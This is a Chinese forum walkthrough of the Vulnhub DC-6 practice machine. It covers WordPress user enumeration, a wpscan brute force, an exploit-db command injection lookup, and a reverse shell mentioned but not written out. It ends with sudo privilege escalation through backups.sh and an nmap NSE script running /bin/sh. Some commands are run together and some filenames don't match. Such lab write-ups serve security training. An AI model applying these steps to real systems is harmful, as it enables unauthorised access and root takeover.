-
-
[原创]小蜘蛛带你一起学习DC-6
-
发表于: 2021-3-5 23:37
-
Vunlnhub靶机DC-6
*注:请严格遵守网络安全法,本文章以培养网络安全人才为核心。
DC-6 靶机
信息收集
nmap扫描结果
查看cms
注意修改名称解析
得知cms使用的wordpress
扫描站点
对站点进行目录扫描
1 | dirb http://10.10.10.222 |
扫描出登录窗口
是一个后台登录页面
枚举站点用户
1 | wpscan --url http://wordy -e u |
将文件拷贝到dcname.txt中
使用工具截取出用户名
1 | grep [+] dc6name.txt | awk '{print $2}' > dc-6-user.txt |
现在用户名有了,管理员登录后台页面也有了,那我们就可以进行暴力破解了
暴力破解
1 | wpscan --url http://Wordy -U dc-6-uname -P /usr/share/wordlists/rockyou.txt |
暴力破解需要很长很长的时间
登录后台页面
可以看到安装了activity_monitor插件
search看一下有没有漏洞
1 | searchsploit wordpress activity monitor |
1 | cp /usr/share/exploitdb/exploits/php/webapps/45274.html ./ |
命令注入漏洞
验证发现,存在命令注入漏洞
打开浏览器代理,反弹到burpsuite
进入Repeater模块
使用nc反向连接kali
查看账号信息
这里我们拿到了一个用户和口令
提权
进入后查看当前用户可执行的操作
发现我们可以运行jens用户下面的backups.sh
1 2 | echo /bin/bash >> backups.shsudo -u jens ./backups.sh |
执行后我们就进入到了jens用户下
我们发现nmap拥有root执行权限
我们继续使用nmap去调用我们的脚本例如/bin/bash.
nmap有执行脚本的功能,通过编写特殊脚本,可以实现利用nmap提权(sudo提权)
利用过程:写入一个执行bash的nmap脚本,运行
1 2 | echo 'os.execute("/bin/sh")' > getShellsudo nmap --script=/tmp/root.nse |
提权成功!
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
